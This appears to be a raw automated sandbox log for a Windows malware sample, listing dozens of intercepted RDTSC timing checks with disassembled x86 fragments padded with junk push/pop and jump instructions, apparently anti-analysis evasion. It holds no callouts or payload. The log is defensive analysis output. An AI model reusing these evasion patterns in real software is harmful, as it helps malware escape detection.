Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAA86D second address: DAA871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB07D9 second address: DB0839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jne 00007FC734E5F776h 0x00000014 pop ecx 0x00000015 push esi 0x00000016 jmp 00007FC734E5F780h 0x0000001b pop esi 0x0000001c popad 0x0000001d nop 0x0000001e js 00007FC734E5F780h 0x00000024 jmp 00007FC734E5F77Ah 0x00000029 push 00000000h 0x0000002b sub bl, 00000060h 0x0000002e push 00000000h 0x00000030 sub bh, 00000014h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC734E5F782h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB0839 second address: DB0856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882089h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB0856 second address: DB085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAF977 second address: DAF97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB7EB1 second address: DB7EC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FC734E5F776h 0x0000000e jp 00007FC734E5F776h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB8156 second address: DB815A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB815A second address: DB8160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC2C9 second address: DBC2D3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC2D3 second address: DBC30E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FC734E5F776h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FC734E5F795h 0x00000013 jnc 00007FC734E5F78Fh 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC30E second address: DBC314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC314 second address: DBC319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC319 second address: DBC365 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC734882085h 0x00000008 jmp 00007FC73488207Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007FC73488207Eh 0x00000018 pop esi 0x00000019 jmp 00007FC73488207Ah 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC73488207Fh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC45F second address: DBC486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC734E5F785h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC486 second address: DBC48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBF7E8 second address: DBF7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBF7EC second address: DBF7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jo 00007FC734882076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D5970C second address: D59717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC734E5F776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D59717 second address: D5971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D5B19C second address: D5B1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D5B1AE second address: D5B1C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D5B1C6 second address: D5B1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC34AC second address: DC34C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jnl 00007FC734882076h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3A96 second address: DC3AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F789h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3AB4 second address: DC3AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 jne 00007FC73488207Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3BF6 second address: DC3BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3BFC second address: DC3C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3C00 second address: DC3C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3C08 second address: DC3C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3C11 second address: DC3C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FC734E5F780h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3D8C second address: DC3D96 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC734882076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3D96 second address: DC3DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC734E5F77Dh 0x0000000c jmp 00007FC734E5F787h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3F0E second address: DC3F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC734882076h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 jng 00007FC734882088h 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pushad 0x00000021 popad 0x00000022 jnp 00007FC734882076h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC73488207Bh 0x00000030 jnp 00007FC734882076h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3F5C second address: DC3F79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC4248 second address: DC4265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop eax 0x00000008 jl 00007FC73488207Ah 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 ja 00007FC73488207Eh 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC44F9 second address: DC44FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC44FE second address: DC453C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC734882087h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FC73488207Eh 0x00000012 jmp 00007FC73488207Fh 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D54900 second address: D54906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D54906 second address: D5490C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC021 second address: DCC048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FC734E5F786h 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FC734E5F776h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D951EF second address: D7C353 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f lea eax, dword ptr [ebp+12479FE2h] 0x00000015 jc 00007FC73488207Ch 0x0000001b push eax 0x0000001c je 00007FC734882085h 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007FC73488207Bh 0x0000002a popad 0x0000002b mov dword ptr [esp], eax 0x0000002e movsx ecx, ax 0x00000031 call dword ptr [ebp+1244A926h] 0x00000037 js 00007FC73488207Ah 0x0000003d push eax 0x0000003e pushad 0x0000003f popad 0x00000040 pop eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push edi 0x00000044 jmp 00007FC73488207Eh 0x00000049 pop edi 0x0000004a push ecx 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d js 00007FC734882076h 0x00000053 pop ecx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D952C9 second address: D952D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D958FC second address: D95901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D95901 second address: D95928 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FC734E5F78Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D960E3 second address: D960E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9649D second address: D964A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D964A1 second address: D964A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D964A7 second address: D964B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D964B1 second address: D964F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d jne 00007FC73488207Ch 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FC734882088h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007FC734882076h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D96620 second address: D96662 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub dx, FD79h 0x00000011 lea eax, dword ptr [ebp+12479FE2h] 0x00000017 xor di, 64B3h 0x0000001c nop 0x0000001d je 00007FC734E5F787h 0x00000023 push edi 0x00000024 jmp 00007FC734E5F77Fh 0x00000029 pop edi 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D96662 second address: D7CF07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC73488207Ch 0x0000000c js 00007FC734882076h 0x00000012 popad 0x00000013 nop 0x00000014 sbb di, E0DAh 0x00000019 sbb ecx, 7009D88Ah 0x0000001f call dword ptr [ebp+122D380Eh] 0x00000025 jnc 00007FC734882097h 0x0000002b jp 00007FC73488207Eh 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC45F second address: DCC469 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC734E5F776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC5F1 second address: DCC5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC5FA second address: DCC605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FC734E5F776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC8AF second address: DCC8CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC8CA second address: DCC8CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC8CF second address: DCC8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCCBA1 second address: DCCBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Eh 0x00000009 jmp 00007FC734E5F77Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD4354 second address: DD4358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD4358 second address: DD435C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD4496 second address: DD44A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC734882076h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD48B6 second address: DD4907 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F786h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d je 00007FC734E5F77Ah 0x00000013 push ecx 0x00000014 jmp 00007FC734E5F77Eh 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e jmp 00007FC734E5F785h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD520E second address: DD5217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD5217 second address: DD5221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD5221 second address: DD5227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD5227 second address: DD5234 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC734E5F778h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD5234 second address: DD5265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FC734882076h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jo 00007FC734882095h 0x00000016 jmp 00007FC734882089h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDAB7D second address: DDAB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F787h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD96F8 second address: DD9704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD9704 second address: DD9719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F781h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD9719 second address: DD9721 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DD9721 second address: DD9726 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDA9DF second address: DDA9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDA9EC second address: DDA9FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDA9FD second address: DDAA15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007FC734882076h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDCD2A second address: DDCD2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DDCD2E second address: DDCD4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC734882087h 0x0000000b rdtsc
